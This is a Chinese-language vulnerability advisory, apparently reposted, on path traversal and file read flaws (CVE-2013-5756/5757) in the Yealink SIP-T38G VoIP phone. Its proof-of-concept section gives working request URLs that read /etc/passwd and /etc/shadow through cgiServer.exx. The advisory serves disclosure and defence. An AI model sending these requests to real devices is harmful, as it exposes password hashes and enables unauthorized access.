T38G绝对路径遍历漏洞

发布日期:2014-08-03
更新日期:2014-08-11

受影响系统:
yealink SIP-T38G
描述:
--------------------------------------------------------------------------------
CVE(CAN) ID: CVE-2013-5757
 
SIP-T38G是亿联千兆彩屏网络电话。
 
Yealink VoIP Phone SIP-T38G存在绝对路径遍历安全漏洞,cgi-bin/cgiServer.exx没有正确过滤用户输入,经过身份验证的远程攻击者通过"command"参数内dumpConfigFile函数的完整路径名,利用此漏洞可读取任意文件。
 
<*来源:Mr.Un1k0d3r
 
  链接:
 *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Title: Yealink VoIP Phone SIP-T38G Local File Inclusion
 Author: Mr.Un1k0d3r & Doreth.Z10 From RingZer0 Team
 Vendor Homepage:
 Version: VoIP Phone SIP-T38G
 CVE: CVE-2013-5756, CVE-2013-5757

Description:

Web interface contain a vulnerability that allow any page to be included.
 We are able to disclose /etc/passwd & /etc/shadow

POC:
 Using the page parameter (CVE-2013-5756):
 
 [host]/cgi-bin/cgiServer.exx?page=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
 
 [host]/cgi-bin/cgiServer.exx?page=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow

Using the command parameter (CVE-2013-5757):
 [host]/cgi-bin/cgiServer.exx?command=dumpConfigFile("/etc/shadow")

*By viewing the shadow file we are able to conclude that cgiServer.exx run
 under the root privileges. This lead to CVE-2013-5759.

建议:
--------------------------------------------------------------------------------
厂商补丁:
 
yealink
 -------
 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
 

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/59b14c91854bc24b95be757dbe703d4b.html